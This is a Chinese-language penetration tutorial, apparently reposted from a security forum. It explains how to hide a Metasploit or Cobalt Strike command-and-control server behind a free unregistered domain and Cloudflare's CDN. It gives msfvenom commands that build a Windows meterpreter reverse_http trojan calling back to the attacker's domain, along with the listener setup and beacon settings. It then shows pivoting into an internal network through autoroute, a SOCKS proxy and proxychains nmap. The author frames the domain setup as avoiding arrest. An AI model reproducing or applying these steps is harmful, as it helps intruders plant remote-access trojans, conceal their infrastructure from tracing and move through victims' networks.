反溯源-cs和msf域名上線

正文

域名和CDN配置

需要的東西：一台國外的VPS 這里我推薦vultr （騰訊雲和阿里雲等國內的VPS是不支持免備案的）

說到域名上線，自然就不能老老實實的去用自己備案了的域名，不然又是一個當場逮捕。

到這里https://freenom.com/ 注冊一個免費且不用備案的的tk域名

這里如果注冊失敗，檢查一下是不是郵箱不對，因為它不支持一些郵箱如163,126郵箱等，可以用gmail注冊。

到這里https://www.cloudflare.com/ 你可以搞到一個免費的CDN

為什么我多次強調免費呢？當然是因為貧窮、

注冊完freenom和cloudflare的賬號之后

在freenom的Nameservers里填上cloudflare所提示的配置信息如下

不要用freenom自帶的域名解析，因為它自帶的沒上CDN ping一下域名就知道VPS ip了

在cloudflare里面配置一個A類的解析 就是vps的ip

然后域名配置的事就算完成了。

這個時候，我ping我域名，解析的ip是CDN的，從而隱藏了我的真實ip。

域名上線

注意事項

Cloudflare有個特點，如果用其他端口的話，是監聽不到的

Cloudflare支持的HTTP端口是：

80,8080,8880,2052,2082,2086,2095

Cloudflare支持的HTTPs端口是：

443,2053,2083,2087,2096,8443

MSF域名上線

首先生成一個meterpreter

平時我們用的比較多的是reverse_tcp，在這里我們要用的是reverse_http

msfvenom -p windows/x64/meterpreter/reverse_http LHOST=cs.XXXX.tk LPORT=2095 -f exe > shell.exe

msfvenom -p windows/x64/meterpreter/reverse_http LHOST=cs.XXXX.tk LPORT=2095 -f exe > shell.exe

上傳到靶機里面運行，VPS監聽

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_http
set lhost cs.XXXX.tk
set LPORT 2095
run

如果在過程中遇到msfconsole關於allocate memory - infocmp，解決方案為

出自 https://www.optiv.com/blog/create-a-budget-friendly-virtual-private-server-with-a-metasploit-instance

root@vultr:~# cd /var
root@vultr:/var# touch swap.img
root@vultr:/var# chmod 600 swap.img
root@vultr:/var# dd if=/dev/zero of=/var/swap.img bs=1024k count=1000
root@vultr:/var# mkswap /var/swap.img
root@vultr:/var# swapon /var/swap.img

這時不出意外我們應該得到了一個session，這時在執行一些操作的時候，靶機用wireshark抓包，看流量

看到的IP是來自CDN 104.24.117.1我們的VPS地址得到了有效的隱藏，如果想解決環境有惡意域名檢測的話，

那么可以用域前置的方式來解決這個問題，這個已經有很多大佬寫了這方面的文章，我這里就不一一描述了。

推薦閱讀 https://xz.aliyun.com/t/4509

CS域名上線

payload選 windows/beacon_http/reverse_http

主機填域名

端口填上面CF支持的任意http端口

生成木馬，靶機運行木馬，

執行一些操作，靶機抓包，查看流量。

CS里面也成功的隱藏了VPS的IP

測試

后來我在想tcp和http的meterpreter會不會存在很多不一樣的地方

會不會在內網滲透的時候代理失敗

於是我開始做了一點簡單的測試

環境

虛擬機 192.168.20.141
本機 10.11.2.225
路由器 10.11.2.128 存在一個web服務
公網vps

VPS監聽來自虛擬機的meterpreter

來測試一下能否掃到路由器的web服務

run autoroute -s 10.11.2.0 -n 255.255.255.0  //添加一個路由 
background
use auxiliary/scanner/http/title
set rhosts 10.11.2.0/24
run

速度上有點慢，但還是掃出了結果

[+] [10.11.2.128:80] [C:200] [R:] [S:EUHTϞП·ԉǷ] EUHTϞП·ԉǷ

嘗試掛代理掃描

use auxiliary/server/socks4a
run

編輯/etc/proxychains.conf 最后一行加上

socks4 0.0.0.0 1080

通過代理用nmap來掃描內網的web服務

proxychains4 nmap -sT -Pn -p445,80 --open 10.11.2.0/24

[proxychains] Strict chain  ...  0.0.0.0:1080  ...  10.11.2.128:80  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  10.11.2.225:445  ...  OK

Nmap scan report for 10.11.2.128
Host is up (6.9s latency).
Not shown: 1 closed port
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 10.11.2.225
Host is up (8.5s latency).
Not shown: 1 closed port
PORT    STATE SERVICE
445/tcp open  microsoft-ds

成功的掃描到了我的物理機和路由器，

說明用域名上線走CDN的meterpreter，也是可以執行一些內網滲透方面的內容，當然，速度上感覺比tcp的慢了許多。

至於tcp和http不同方式上線，是否會導致某些msf模塊無法使用，需要在后續的過程中慢慢摸索，我只發現了有很多模塊http和tcp都無法通過代理的方式使用，如nmap的ping存活掃描，arp掃描等。

原文鏈接：https://xz.aliyun.com/t/5728